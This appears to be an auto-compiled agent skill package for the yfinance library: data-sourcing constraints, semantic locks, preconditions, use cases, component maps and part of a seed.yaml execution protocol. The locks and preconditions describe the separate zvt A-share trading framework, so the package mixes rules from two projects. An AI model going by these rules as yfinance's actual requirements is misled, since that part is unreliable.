- [live_streaming_(websocket)](components/live_streaming_-websocket.md): 4 classes
- [caching_layer](components/caching_layer.md): 5 classes

FILE:references/CONSTRAINTS.md
# Constraints

## preservation_manifest

```yaml
required_objects:
  business_decisions_count: 60
  fatal_constraints_count: 31
  non_fatal_constraints_count: 188
  use_cases_count: 12
  semantic_locks_count: 12
  preconditions_count: 4
  evidence_quality_rules_count: 2
  traceback_scenarios_count: 5

```

## Domain Constraints Injected (16)

- **`SHARED-DS-RL-001`** <sub>(fatal)</sub>: Rate Limit + 指数退避重试：所有外部数据 API 调用必须实施速率限制控制 和指数退避重试（Exponential Backoff with Jitter）。收到 429/503 响应后 立即重试是反模式，会加剧服务端压力并触发 IP 封禁。 最大重试次数 3-5 次，退避基数 1-2 秒，最大退避 60 秒。
- **`SHARED-DS-RL-002`** <sub>(high)</sub>: 批量 API 调用必须控制并发数（max_workers），不可无限制并行。 免费 API（akshare/tushare 免费版）通常限制为 1-3 并发； 付费 API 也有并发上限（tushare 积分制，不同积分对应不同并发）。 超出并发限制会触发 429 或 IP 封禁。推荐使用 asyncio.Semaphore 或 ThreadPoolExecutor 的 max_workers 参数显式控制。
- **`SHARED-DS-RL-003`** <sub>(high)</sub>: API Token / 凭证安全：数据源 API key（tushare token / akshare 无需 token 但 其他商业数据源需要）不可硬编码在代码中，必须通过环境变量或配置文件读取。 硬编码 token 提交到 Git 会导致 token 泄露和费用损失。
- **`SHARED-DS-RL-004`** <sub>(medium)</sub>: 请求节流（Throttling）：对同一 API 的批量请求应在请求间插入最小间隔 （akshare 部分接口要求 ≥ 0.5s；tushare 免费版每分钟 200 次）。 纯代码 sleep 不如令牌桶（Token Bucket）算法精确，推荐使用 ratelimit 或 slowapi 等成熟库。
- **`SHARED-DS-MISS-001`** <sub>(high)</sub>: 停牌日数据缺失策略：停牌股票在停牌期间无成交数据，数据库中会出现日期缺口。 缺失日期不可使用 forward-fill（会产生虚假成交量）； 应在数据库中以 is_suspended=True 标记，量和成交额填 0，价格保留前一日收盘价。 因子计算时必须过滤 is_suspended=True 的行。
- **`SHARED-DS-MISS-002`** <sub>(medium)</sub>: 新上市股票的历史数据边界：新股上市首日开始在数据库中出现，但其上市前 无历史数据。若因子计算的 lookback 期超过上市天数，会产生所有 NaN 因子值。 采集时应记录每只股票的上市日期（list_date），采集逻辑应以上市日期为起点， 不以固定开始日期。
- **`SHARED-DS-MISS-003`** <sub>(high)</sub>: 退市股票的数据完整性：已退市股票在主流数据源（akshare/tushare）中依然 可以查询历史数据（退市前的历史），但退市日期后无数据。 历史股票池构建时必须包含已退市股票（否则幸存者偏差）， 且采集时需明确处理退市日截止边界。
- **`SHARED-DS-MISS-004`** <sub>(high)</sub>: 多数据源数据对账（Cross-Source Reconciliation）：同一数据（如收盘价） 从不同数据源（akshare/tushare/baostock）获取可能存在细微差异 （不同复权方式/不同节假日处理/除息调整时间不同）。 应在 pipeline 中实施多源对账检查，差异超阈值（如 0.1%）时记录告警并人工确认。
- **`SHARED-DS-TIME-001`** <sub>(high)</sub>: 时间戳精度与类型一致性：数据库中时间戳应使用统一的数据类型 （timestamp 而非 varchar/int）。混用字符串日期（'2024-01-15'）和 Timestamp 对象是比较、索引、merge 出现细微 bug 的常见来源， 应在 pipeline 入口处强制转换。
- **`SHARED-DS-TIME-002`** <sub>(high)</sub>: 交易时间与自然时间的区分：日线数据的"日期"通常对应交易日（T日）， 而新闻/公告数据的"时间"是自然时间。合并两类数据时，必须将自然时间 映射到下一个可用交易日（next available trading day）， 否则会产生"公告在T日，但T日盘中已经可用"的 lookahead 问题。
- **`SHARED-DS-TIME-003`** <sub>(medium)</sub>: 夏令时（DST）处理：采集美股/欧洲股市数据时，夏令时切换日（3月/11月） 会导致同一 HH:MM 时刻对应不同的 UTC 时间，若未处理，当日时序数据 会出现1小时的漂移。应始终以 UTC 存储，展示时按市场本地时区转换。
- **`SHARED-DS-INCR-001`** <sub>(high)</sub>: 增量更新幂等性：数据更新脚本必须是幂等的（多次运行结果相同）。 若脚本因网络中断在中途失败，重新运行时不应产生重复数据或数据缺口。 实现方式：先写入临时表，校验后 UPSERT 到主表，不直接 INSERT/APPEND。
- **`SHARED-DS-INCR-002`** <sub>(high)</sub>: 数据完整性检验（数据校验和/行数检查）：每次数据更新后， 应对关键字段做完整性检验：行数是否在预期范围内、价格是否为正数、 日期是否连续（无缺失交易日）。缺少自动校验的数据管道是"沉默腐烂"的根源。
- **`SHARED-DS-INCR-003`** <sub>(medium)</sub>: 数据版本化：数据管道的输出数据应版本化管理（data versioning）。 当数据源更新了历史数据（如修订调整后的财务数据）， 旧版本数据应保留可追溯，不应静默覆盖，以便对比版本间差异及复现历史回测。
- **`SHARED-DS-INCR-004`** <sub>(medium)</sub>: 数据对齐到交易日历边界：采集完成后，应验证所有股票/资产的数据覆盖 完整性与交易日历的一致性。每只股票在每个交易日都应有一行数据 （停牌标记，不是缺失）。通过 pivot_table 检查 NaN 比例是有效的快速诊断手段。
- **`SHARED-DS-INCR-005`** <sub>(medium)</sub>: 缓存策略（Caching）：频繁读取的静态/低频更新数据（如股票信息、行业分类、 指数成分股）应本地缓存，避免每次运行重复 API 调用。 缓存必须设置过期时间（TTL），防止使用过期的行业分类或已失效的成分股信息。

FILE:references/LOCKS.md
# Semantic Locks + Preconditions

## Semantic Locks (12)

### `SL-01` <sub>(on_violation: fatal)</sub>
Execute sell orders before buy orders in every trading cycle

### `SL-02` <sub>(on_violation: fatal)</sub>
Trading signals MUST use next-bar execution (no look-ahead)

### `SL-03` <sub>(on_violation: fatal)</sub>
Entity IDs MUST follow format entity_type_exchange_code

### `SL-04` <sub>(on_violation: fatal)</sub>
DataFrame index MUST be MultiIndex (entity_id, timestamp)

### `SL-05` <sub>(on_violation: fatal)</sub>
TradingSignal MUST have EXACTLY ONE of: position_pct, order_money, order_amount

### `SL-06` <sub>(on_violation: fatal)</sub>
filter_result column semantics: True=BUY, False=SELL, None/NaN=NO ACTION

### `SL-07` <sub>(on_violation: fatal)</sub>
Transformer MUST run BEFORE Accumulator in factor pipeline

### `SL-08` <sub>(on_violation: fatal)</sub>
MACD parameters locked: fast=12, slow=26, signal=9

### `SL-09` <sub>(on_violation: warning)</sub>
Default transaction costs: buy_cost=0.001, sell_cost=0.001, slippage=0.001

### `SL-10` <sub>(on_violation: fatal)</sub>
A-share equity trading is T+1 (no same-day close of buy positions)

### `SL-11` <sub>(on_violation: fatal)</sub>
Recorder subclass MUST define provider AND data_schema class attributes

### `SL-12` <sub>(on_violation: fatal)</sub>
Factor result_df MUST contain either 'filter_result' OR 'score_result' column

## Preconditions (4)

- **`PC-01`**: `python3 -c 'import zvt; print(zvt.__version__)'` → on_fail: Run: python3 -m pip install zvt then re-run: python3 -m zvt.init_dirs to initialize data directories
- **`PC-02`**: `python3 -c "from zvt.api.kdata import get_kdata; df = get_kdata(entity_ids=['stock_sh_600000'], limit=1); assert df is not None and len(df) > 0, 'No kdata found'"` → on_fail: Run recorder first: python3 -m zvt.recorders.em.em_stock_kdata_recorder --entity_ids stock_sh_600000 (replace with your target entity IDs)
- **`PC-03`**: `python3 -c "import os; from pathlib import Path; zvt_home = Path(os.environ.get('ZVT_HOME', Path.home() / '.zvt')); assert zvt_home.exists(), f'ZVT home not found: {zvt_home}'"` → on_fail: Run: python3 -m zvt.init_dirs
- **`PC-04`**: `python3 -c "import os, tempfile; from pathlib import Path; zvt_home = Path(os.environ.get('ZVT_HOME', Path.home() / '.zvt')); test_f = zvt_home / '.write_test'; test_f.touch(); test_f.unlink()"` → on_fail: Check directory permissions: chmod u+w ~/.zvt or set ZVT_HOME environment variable to a writable location

FILE:references/USE_CASES.md
# Known Use Cases (KUC)

Total: **12**

## `KUC-101`
**Source**: `tests/test_utils.py`

Ensures date/timezone parsing and validation utilities work correctly for handling mixed timezone data from financial APIs.

## `KUC-102`
**Source**: `tests/test_screener.py`

Tests the ability to filter and screen stocks based on financial criteria like price thresholds and predefined strategies.

## `KUC-103`
**Source**: `tests/test_search.py`

Allows users to find ticker symbols by searching company names or partial queries, including fuzzy matching for misspellings.

## `KUC-104`
**Source**: `tests/test_calendars.py`

Retrieves upcoming earnings dates and IPO information calendars to help investors track corporate events.

## `KUC-105`
**Source**: `tests/test_prices.py`

Fetches historical price and volume data for securities across multiple intervals (daily, weekly, monthly) and time periods.

## `KUC-106`
**Source**: `tests/test_ticker.py`

Retrieves comprehensive metadata for a ticker including holder information, splits, recommendations, and fundamental data.

## `KUC-107`
**Source**: `tests/test_price_repair.py`

Corrects corrupted or misaligned price data and resamples data between different time intervals while maintaining data integrity.

## `KUC-108`
**Source**: `tests/test_live.py`

Provides real-time cryptocurrency price streaming via WebSocket for trading applications and live market monitoring.

## `KUC-109`
**Source**: `tests/test_cache_noperms.py`

Handles cache storage gracefully when running in restricted environments without write permissions to the filesystem.

## `KUC-110`
**Source**: `tests/test_multi.py`

Downloads price data for multiple tickers concurrently with thread safety, ensuring results don't get mixed between tickers.

## `KUC-111`
**Source**: `tests/test_lookup.py`

Looks up ticker symbols filtered by asset type (stocks, ETFs, mutual funds, indices) to find specific securities.

## `KUC-112`
**Source**: `tests/test_cache.py`

Caches timezone data for securities to reduce API calls and improve performance when fetching data for frequently-used tickers.

FILE:references/WISDOM.md
# Cross-Project Wisdom

Total: **8**

## `CW-DATA-SOURCING-001` — Exponential backoff retry with rate limit detection
**From**: finance-bp-079--akshare, finance-bp-114--edgar-crawler · **Applicable to**: data-sourcing

Implement retry logic with exponential backoff specifically for HTTP 429 rate limit responses. Retrying immediately on rate limit errors worsens the block situation. Separate retry logic for transient network errors (TimeoutError, ConnectionError) from permanent errors (ValueError, KeyError) prevents resource waste and masks underlying bugs.

## `CW-DATA-SOURCING-002` — Strict date format validation and standardization
**From**: finance-bp-070--edgartools, finance-bp-079--akshare, finance-bp-084--eastmoney · **Applicable to**: data-sourcing

Validate date formats strictly (YYYY-MM-DD pattern with leap year and month-end checks) before processing XBRL or API data. Convert date strings between formats (YYYYMMDD to YYYY-MM-DD) when storing to databases. Invalid dates corrupt downstream financial calculations.

## `CW-DATA-SOURCING-003` — XBRL fact attribute completeness enforcement
**From**: finance-bp-070--edgartools, finance-bp-114--edgar-crawler · **Applicable to**: data-sourcing

Extract and validate all essential XBRL fact attributes (concept, value, period, unit) from every fact. Missing attributes cause financial analysis queries to return incomplete or misleading results. Period type (instant vs duration) must be correctly distinguished for accurate balance sheet rendering.

## `CW-DATA-SOURCING-004` — Streaming parser threshold for large documents
**From**: finance-bp-070--edgartools, finance-bp-128--yfinance · **Applicable to**: data-sourcing

Implement streaming parser activation when documents exceed configurable thresholds (10MB default). This prevents OOM errors on large NPORT-P filings or bulk document downloads. Also require timezone information for time-series data to prevent DST offset corruption.

## `CW-DATA-SOURCING-005` — Data accuracy disclaimer requirements
**From**: finance-bp-079--akshare, finance-bp-128--yfinance, finance-bp-097--OpenBB · **Applicable to**: data-sourcing

Always present scraped or third-party financial data with proper caveats about accuracy limitations and delays. Claims of guaranteed accuracy, real-time capabilities, or Yahoo/provider affiliation violate terms of service and can lead to user financial losses from reliance on delayed or incorrect data.

## `CW-DATA-SOURCING-006` — Atomic write ordering for versioned storage
**From**: finance-bp-103--ArcticDB · **Applicable to**: data-sourcing

Write atom keys (TABLE_DATA, TABLE_INDEX, VERSION) before updating mutable reference keys (VERSION_REF, SNAPSHOT_REF). Never modify atom keys after writing to preserve content-addressed storage invariants. This prevents readers from accessing incomplete data in multi-writer scenarios.

## `CW-DATA-SOURCING-007` — HTTP status code validation before data processing
**From**: finance-bp-079--akshare, finance-bp-097--OpenBB · **Applicable to**: data-sourcing

Always validate HTTP response status codes before processing response data. Error responses (404, 500) may contain HTML error pages that corrupt downstream JSON parsing. Explicitly check for HTTP 429 and raise RateLimitError for proper handling by callers.

## `CW-DATA-SOURCING-008` — Quality gates for financial recommendations
**From**: finance-bp-084--eastmoney · **Applicable to**: data-sourcing

Apply fundamental quality filters (ROE thresholds, OCF/Profit ratios, debt ratios) before generating financial recommendations. Without quality gates, low-quality stocks may be recommended for positions, leading to investment losses. Separate on-demand computation from scheduled pre-computation to handle API rate limits.

FILE:references/components/batch_download_orchestration.md
# batch_download_orchestration (4 classes)

## `download`
`batch_download_orchestration/download.py:0`

## `_download_one`
`batch_download_orchestration/download-one.py:0`

## `ProgressBar`
`batch_download_orchestration/progressbar.py:0`

## `threading_model`
`batch_download_orchestration/threading-model.py:0`

FILE:references/components/caching_layer.md
# caching_layer (5 classes)

## `_TzCache.get`
`caching_layer/tzcache-get.py:0`

## `_TzCache.set`
`caching_layer/tzcache-set.py:0`

## `_ISINCache.lookup`
`caching_layer/isincache-lookup.py:0`

## `_CookieCache.get`
`caching_layer/cookiecache-get.py:0`

## `cache_backend`
`caching_layer/cache-backend.py:0`

FILE:references/components/domain_entities_-sector-industry.md
# domain_entities_(sector/industry) (5 classes)

## `Sector.top_companies`
`domain_entities_(sector/industry)/sector-top-companies.py:0`

## `Sector.etfs`
`domain_entities_(sector/industry)/sector-etfs.py:0`

## `Industry.top_companies`
`domain_entities_(sector/industry)/industry-top-companies.py:0`

## `Domain._fetch_and_parse`
`domain_entities_(sector/industry)/domain-fetch-and-parse.py:0`

## `data_source`
`domain_entities_(sector/industry)/data-source.py:0`

FILE:references/components/http_-_session_management.md
# http_&_session_management (4 classes)

## `YfData.get_json`
`http_&_session_management/yfdata-get-json.py:0`

## `YfData.post`
`http_&_session_management/yfdata-post.py:0`

## `ConfigMgr.get_config`
`http_&_session_management/configmgr-get-config.py:0`

## `session_backend`
`http_&_session_management/session-backend.py:0`

FILE:references/components/live_streaming_-websocket.md
# live_streaming_(websocket) (4 classes)

## `WebSocket.connect`
`live_streaming_(websocket)/websocket-connect.py:0`

## `WebSocket.subscribe`
`live_streaming_(websocket)/websocket-subscribe.py:0`

## `AsyncWebSocket.connect`
`live_streaming_(websocket)/asyncwebsocket-connect.py:0`

## `websocket_url`
`live_streaming_(websocket)/websocket-url.py:0`

FILE:references/components/price_history_retrieval_-_repair.md
# price_history_retrieval_&_repair (7 classes)

## `PriceHistory.fetch`
`price_history_retrieval_&_repair/pricehistory-fetch.py:0`

## `_reconstruct_intervals_batch`
`price_history_retrieval_&_repair/reconstruct-intervals-batch.py:0`

## `_fix_unit_random_mixups`
`price_history_retrieval_&_repair/fix-unit-random-mixups.py:0`

## `_fix_bad_div_adjust`
`price_history_retrieval_&_repair/fix-bad-div-adjust.py:0`

## `_repair_capital_gains`
`price_history_retrieval_&_repair/repair-capital-gains.py:0`

## `price_repair_strategy`
`price_history_retrieval_&_repair/price-repair-strategy.py:0`

## `data_source`
`price_history_retrieval_&_repair/data-source.py:0`

FILE:references/components/quote_-_financial_analysis.md
# quote_&_financial_analysis (5 classes)

## `Quote.fetch_info`
`quote_&_financial_analysis/quote-fetch-info.py:0`

## `Analysis.fetch_estimates`
`quote_&_financial_analysis/analysis-fetch-estimates.py:0`

## `Fundamentals.fetch_financials`
`quote_&_financial_analysis/fundamentals-fetch-financials.py:0`

## `FastInfo.price`
`quote_&_financial_analysis/fastinfo-price.py:0`

## `info_data_source`
`quote_&_financial_analysis/info-data-source.py:0`

FILE:references/components/stock_screener.md
# stock_screener (4 classes)

## `EquityQuery.add_filter`
`stock_screener/equityquery-add-filter.py:0`

## `screen`
`stock_screener/screen.py:0`

## `QueryBase.valid_fields`
`stock_screener/querybase-valid-fields.py:0`

## `query_validation`
`stock_screener/query-validation.py:0`

FILE:references/components/ticker_facade.md
# ticker_facade (8 classes)

## `Ticker.history`
`ticker_facade/ticker-history.py:0`

## `Ticker.get_info`
`ticker_facade/ticker-get-info.py:0`

## `Ticker.income_stmt`
`ticker_facade/ticker-income-stmt.py:0`

## `Ticker.balance_sheet`
`ticker_facade/ticker-balance-sheet.py:0`

## `Ticker.cashflow`
`ticker_facade/ticker-cashflow.py:0`

## `Ticker.recommendations`
`ticker_facade/ticker-recommendations.py:0`

## `Ticker.get`
`ticker_facade/ticker-get.py:0`

## `session_injection`
`ticker_facade/session-injection.py:0`

FILE:references/seed.yaml
meta:
  id: finance-bp-128-v5.3
  version: v6.1
  blueprint_id: finance-bp-128
  sop_version: crystal-compilation-v6.1
  source_language: en
  compiled_at: '2026-04-22T13:01:04.148127+00:00'
  target_host: openclaw
  authoritative_artifact:
    primary: seed.yaml
    non_authoritative_derivatives:
    - SKILL.md (host-generated summary, may lag)
    - HEARTBEAT.md (host telemetry)
    - memory/*.md (host conversational memory)
    rule: On any behavioral decision (preconditions check, OV assertion, EQ rule firing, spec_lock verification), agents MUST
      re-read seed.yaml. Derivatives are for UI display only and may be out-of-date.
  execution_protocol:
    install_trigger:
    - Execute resources.host_adapter.install_recipes[] in declared order
    - Verify each package with import check before proceeding
    execute_trigger: When user intent matches intent_router.uc_entries[].positive_terms AND user uses action verb (run/execute/跑/执行/backtest/fetch/collect)
    on_execute:
    - Reload seed.yaml (do not rely on SKILL.md or cached summaries)
    - Run preconditions[] in declared order; halt on first fatal failure with on_fail message to user
    - Enter context_state_machine.CA1_MEMORY_CHECKED state
    - Evaluate evidence_quality.enforcement_rules[]; prepend user_disclosure_template
    - Translate user_facing_fields to user locale per locale_contract
    - "[V6 READING ORDER]\nThis crystal contains the following V6 layers. Before answering any business question, the host\
      \ MUST read them in order:\n  1. anti_patterns[] — cross-project anti-patterns (with AP-* ids)\n  2. cross_project_wisdom[]\
      \ — cross-project wisdom (with CW-* ids)\n  3. domain_constraints_injected[] — domain constraints (SHARED-* ids)\n \
      \ 4. known_use_cases[] — concrete business scenarios (KUC-* ids)\n  5. component_capability_map — AST component map\
      \ (by module)\n\nWhen answering user questions, proactively cite relevant AP-*/CW-*/SHARED-*/KUC-* ids with source text.\
      \ Examples: T+1 rules -> cite SHARED-* constraint; model comparison -> warn via AP-*; follow-holdings strategy -> cite\
      \ KUC-* with example file."
    workspace_resolution:
      scripts_path: '{host_workspace}/scripts/'
      skills_path: '{host_workspace}/skills/'
      trace_path: '{host_workspace}/.trace/'
  capability_tags:
    markets:
    - multi-market
    activities:
    - data-sourcing
  upgraded_from: finance-bp-128-v1.seed.yaml
  upgraded_at: '2026-04-22T13:20:35.588540+00:00'
  v6_inputs:
    ast_mind_map: knowledge/sources/finance/finance-bp-128--yfinance/v6_inputs/ast_mind_map.yaml
    anti_patterns: null
    cross_project_wisdom: null
    examples_kuc: knowledge/sources/finance/finance-bp-128--yfinance/v6_inputs/examples_kuc.yaml
    shared_pools_dir: knowledge/sources/finance/_shared
anti_patterns:
- id: AP-DATA-SOURCING-001
  title: Missing or invalid User-Agent headers for SEC API requests
  description: SEC EDGAR requires valid User-Agent identity with contact information in headers. Without this, requests are
    rejected with 403 Forbidden errors, completely blocking all filing access. Both edgartools and edgar-crawler enforce this
    constraint as fundamental to any data retrieval operation.
  project_source: finance-bp-070--edgartools, finance-bp-114--edgar-crawler
  severity: high
  applicable_to_tags:
    markets:
    - multi-market
    activities:
    - data-sourcing
  _source_file: anti-patterns/data-sourcing.yaml
- id: AP-DATA-SOURCING-002
  title: Ignoring external API rate limits causing IP blocking
  description: Multiple financial data sources (SEC EDGAR, Sina, Eastmoney, TuShare) enforce strict rate limits (10 req/sec,
    120 calls/minute). Exceeding these triggers temporary IP blocks lasting 10-60 minutes, causing complete data unavailability.
    Immediate retry attempts during blocks extend the block duration significantly.
  project_source: finance-bp-070--edgartools, finance-bp-079--akshare, finance-bp-084--eastmoney, finance-bp-114--edgar-crawler
  severity: high
  applicable_to_tags:
    markets:
    - multi-market
    activities:
    - data-sourcing
  _source_file: anti-patterns/data-sourcing.yaml
- id: AP-DATA-SOURCING-003
  title: No HTTP timeout configuration causing indefinite hangs
  description: HTTP requests to external financial data sources (Yahoo, Sina, Eastmoney) without timeout values can hang indefinitely
    on blocked connections. This freezes the entire application and prevents data collection from all other sources, creating
    cascading failures across the system.
  project_source: finance-bp-079--akshare
  severity: high
  applicable_to_tags:
    markets:
    - multi-market
    activities:
    - data-sourcing
  _source_file: anti-patterns/data-sourcing.yaml
- id: AP-DATA-SOURCING-004
  title: Invalidating XBRL period types for balance sheet analysis
  description: Balance sheets represent point-in-time snapshots (instant periods), not ranges (duration periods). Using duration
    periods for balance sheet statements causes stockholder equity and other line items to show nonsensical date ranges, corrupting
    financial calculations that depend on accurate period associations.
  project_source: finance-bp-070--edgartools
  severity: high
  applicable_to_tags:
    markets:
    - multi-market
    activities:
    - data-sourcing
  _source_file: anti-patterns/data-sourcing.yaml
- id: AP-DATA-SOURCING-005
  title: Malformed or empty JSON responses causing silent failures
  description: Financial API responses containing malformed JSON raise unhandled ValueError exceptions, crashing downstream
    processing. Similarly, empty JSON responses (empty dict, list, null) masquerading as valid data cause silent failures
    producing empty DataFrames or misleading results in financial analysis.
  project_source: finance-bp-079--akshare
  severity: medium
  applicable_to_tags:
    markets:
    - multi-market
    activities:
    - data-sourcing
  _source_file: anti-patterns/data-sourcing.yaml
- id: AP-DATA-SOURCING-006
  title: Source-specific symbol mapping errors causing data corruption
  description: Stock symbols require source-specific formatting (sh/sz prefixes for Sina, numeric codes for THS, etc.). Incorrect
    symbol mapping causes API calls to return empty results or wrong data, corrupting financial datasets with missing records
    or entirely incorrect tickers being stored.
  project_source: finance-bp-079--akshare
  severity: high
  applicable_to_tags:
    markets:
    - multi-market
    activities:
    - data-sourcing
  _source_file: anti-patterns/data-sourcing.yaml
- id: AP-DATA-SOURCING-007
  title: Using unsupported DataFrame types with time-series storage
  description: ArcticDB does not support MultiIndex columns, PyArrow-backed pandas DataFrames, or timedelta64 columns. Attempting
    to write these DataFrame types raises ArcticDbNotYetImplemented exceptions, causing write failures and permanent data
    loss if not properly handled before storage operations.
  project_source: finance-bp-103--ArcticDB
  severity: high
  applicable_to_tags:
    markets:
    - multi-market
    activities:
    - data-sourcing
  _source_file: anti-patterns/data-sourcing.yaml
- id: AP-DATA-SOURCING-008
  title: Non-atomic storage writes causing concurrent access corruption
  description: Storage backends without atomic write_if_none operations can cause data corruption under concurrent multi-writer
    access. Similarly, updating reference keys before atom keys complete allows readers to access incomplete or missing data,
    breaking version chain integrity.
  project_source: finance-bp-103--ArcticDB
  severity: high
  applicable_to_tags:
    markets:
    - multi-market
    activities:
    - data-sourcing
  _source_file: anti-patterns/data-sourcing.yaml
- id: AP-DATA-SOURCING-009
  title: Missing timezone-aware DatetimeIndex causing DST offset errors
  description: Price history DataFrames returned without timezone-aware DatetimeIndex cause incorrect timestamp interpretation
    when combined with other timezone-aware data. This leads to 23-25 hour offset errors during daylight saving time transitions,
    corrupting historical price calculations.
  project_source: finance-bp-128--yfinance
  severity: high
  applicable_to_tags:
    markets:
    - multi-market
    activities:
    - data-sourcing
  _source_file: anti-patterns/data-sourcing.yaml
- id: AP-DATA-SOURCING-010
  title: 8-K filing item numbering scheme mismatch for historical filings
  description: 8-K filings use obsolete item numbering (1-12) before 2004-08-23 and new numbering (1.01-9.01) after. Using
    the wrong numbering scheme causes no matches for historical filings, resulting in empty item sections and complete extraction
    failure for pre-2004 data.
  project_source: finance-bp-114--edgar-crawler
  severity: medium
  applicable_to_tags:
    markets:
    - multi-market
    activities:
    - data-sourcing
  _source_file: anti-patterns/data-sourcing.yaml
- id: AP-DATA-SOURCING-011
  title: Yahoo Finance missing crumb authentication causing 401/403 errors
  description: Yahoo Finance API requires crumb and cookie authentication with every request. Without proper crumb management,
    API calls return 401 Unauthorized or HTML error pages instead of JSON data, breaking all downstream price and financial
    data processing.
  project_source: finance-bp-128--yfinance
  severity: high
  applicable_to_tags:
    markets:
    - multi-market
    activities:
    - data-sourcing
  _source_file: anti-patterns/data-sourcing.yaml
- id: AP-DATA-SOURCING-012
  title: Large document parsing without streaming causing OOM errors
  description: SEC filings can exceed 160MB, and parsing large documents in memory without streaming causes OOM errors that
    crash the entire service for all users. Documents exceeding 10MB require switching to streaming parsers to prevent extreme
    memory usage.
  project_source: finance-bp-070--edgartools
  severity: high
  applicable_to_tags:
    markets:
    - multi-market
    activities:
    - data-sourcing
  _source_file: anti-patterns/data-sourcing.yaml
- id: AP-DATA-SOURCING-013
  title: Column mapping length mismatch causing DataFrame errors
  description: Column mapping constants with length mismatch against actual API response columns cause ValueError exceptions
    during DataFrame construction. Raw field names (f1, f2, f12) must be mapped to meaningful names (最新价, 涨跌幅) with exact
    column count alignment.
  project_source: finance-bp-079--akshare
  severity: medium
  applicable_to_tags:
    markets:
    - multi-market
    activities:
    - data-sourcing
  _source_file: anti-patterns/data-sourcing.yaml
- id: AP-DATA-SOURCING-014
  title: Pruning snapshot-protected versions breaking point-in-time recovery
  description: Deleting or pruning versions that are referenced by existing snapshots breaks historical data access. Snapshots
    provide point-in-time recovery capabilities, and removing their referenced versions causes read failures when users attempt
    to access data from specific snapshots.
  project_source: finance-bp-103--ArcticDB
  severity: high
  applicable_to_tags:
    markets:
    - multi-market
    activities:
    - data-sourcing
  _source_file: anti-patterns/data-sourcing.yaml
cross_project_wisdom:
- wisdom_id: CW-DATA-SOURCING-001
  source_project: finance-bp-079--akshare, finance-bp-114--edgar-crawler
  pattern_name: Exponential backoff retry with rate limit detection
  description: Implement retry logic with exponential backoff specifically for HTTP 429 rate limit responses. Retrying immediately
    on rate limit errors worsens the block situation. Separate retry logic for transient network errors (TimeoutError, ConnectionError)
    from permanent errors (ValueError, KeyError) prevents resource waste and masks underlying bugs.
  applicable_to_activity: data-sourcing
  _source_file: cross-project-wisdom/data-sourcing.yaml
- wisdom_id: CW-DATA-SOURCING-002
  source_project: finance-bp-070--edgartools, finance-bp-079--akshare, finance-bp-084--eastmoney
  pattern_name: Strict date format validation and standardization
  description: Validate date formats strictly (YYYY-MM-DD pattern with leap year and month-end checks) before processing XBRL
    or API data. Convert date strings between formats (YYYYMMDD to YYYY-MM-DD) when storing to databases. Invalid dates corrupt
    downstream financial calculations.
  applicable_to_activity: data-sourcing
  _source_file: cross-project-wisdom/data-sourcing.yaml
- wisdom_id: CW-DATA-SOURCING-003
  source_project: finance-bp-070--edgartools, finance-bp-114--edgar-crawler
  pattern_name: XBRL fact attribute completeness enforcement
  description: Extract and validate all essential XBRL fact attributes (concept, value, period, unit) from every fact. Missing
    attributes cause financial analysis queries to return incomplete or misleading results. Period type (instant vs duration)
    must be correctly distinguished for accurate balance sheet rendering.
  applicable_to_activity: data-sourcing
  _source_file: cross-project-wisdom/data-sourcing.yaml
- wisdom_id: CW-DATA-SOURCING-004
  source_project: finance-bp-070--edgartools, finance-bp-128--yfinance
  pattern_name: Streaming parser threshold for large documents
  description: Implement streaming parser activation when documents exceed configurable thresholds (10MB default). This prevents
    OOM errors on large NPORT-P filings or bulk document downloads. Also require timezone information for time-series data
    to prevent DST offset corruption.
  applicable_to_activity: data-sourcing
  _source_file: cross-project-wisdom/data-sourcing.yaml
- wisdom_id: CW-DATA-SOURCING-005
  source_project: finance-bp-079--akshare, finance-bp-128--yfinance, finance-bp-097--OpenBB
  pattern_name: Data accuracy disclaimer requirements
  description: Always present scraped or third-party financial data with proper caveats about accuracy limitations and delays.
    Claims of guaranteed accuracy, real-time capabilities, or Yahoo/provider affiliation violate terms of service and can
    lead to user financial losses from reliance on delayed or incorrect data.
  applicable_to_activity: data-sourcing
  _source_file: cross-project-wisdom/data-sourcing.yaml
- wisdom_id: CW-DATA-SOURCING-006
  source_project: finance-bp-103--ArcticDB
  pattern_name: Atomic write ordering for versioned storage
  description: Write atom keys (TABLE_DATA, TABLE_INDEX, VERSION) before updating mutable reference keys (VERSION_REF, SNAPSHOT_REF).
    Never modify atom keys after writing to preserve content-addressed storage invariants. This prevents readers from accessing
    incomplete data in multi-writer scenarios.
  applicable_to_activity: data-sourcing
  _source_file: cross-project-wisdom/data-sourcing.yaml
- wisdom_id: CW-DATA-SOURCING-007
  source_project: finance-bp-079--akshare, finance-bp-097--OpenBB
  pattern_name: HTTP status code validation before data processing
  description: Always validate HTTP response status codes before processing response data. Error responses (404, 500) may
    contain HTML error pages that corrupt downstream JSON parsing. Explicitly check for HTTP 429 and raise RateLimitError
    for proper handling by callers.
  applicable_to_activity: data-sourcing
  _source_file: cross-project-wisdom/data-sourcing.yaml
- wisdom_id: CW-DATA-SOURCING-008
  source_project: finance-bp-084--eastmoney
  pattern_name: Quality gates for financial recommendations
  description: Apply fundamental quality filters (ROE thresholds, OCF/Profit ratios, debt ratios) before generating financial
    recommendations. Without quality gates, low-quality stocks may be recommended for positions, leading to investment losses.
    Separate on-demand computation from scheduled pre-computation to handle API rate limits.
  applicable_to_activity: data-sourcing
  _source_file: cross-project-wisdom/data-sourcing.yaml
domain_constraints_injected:
- id: SHARED-DS-RL-001
  statement: 'Rate Limit + 指数退避重试：所有外部数据 API 调用必须实施速率限制控制 和指数退避重试（Exponential Backoff with Jitter）。收到 429/503 响应后 立即重试是反模式，会加剧服务端压力并触发
    IP 封禁。 最大重试次数 3-5 次，退避基数 1-2 秒，最大退避 60 秒。

    '
  severity: fatal
  capability_tags:
    activities:
    - data-sourcing
  applicable_conditions:
    blueprint_has_stage:
    - data_collection
  incompatible_with_tags: {}
  stage_id_remap_hints:
  - from_stage: data_collection
    constraint_context: all external API calls must implement exponential backoff retry with jitter
  evidence_refs:
  - type: community_validated
    ref: AWS《重试行为最佳实践》；akshare 文档限速说明；tushare 文档请求频率限制
    url: https://docs.aws.amazon.com/general/latest/gr/api-retries.html
  reference_code:
    bad_example: "# BAD: 立即重试，不退避，加剧 429\nfor attempt in range(5):\n    try:\n        data = api.get(symbol)\n        break\n\
      \    except RateLimitError:\n        time.sleep(0.1)  # 100ms 立即重试，会加剧问题\n"
    good_example: "# GOOD: 指数退避 + Jitter 重试\nimport random\n\ndef fetch_with_retry(func, *args, max_retries=5, base_delay=1.0):\n\
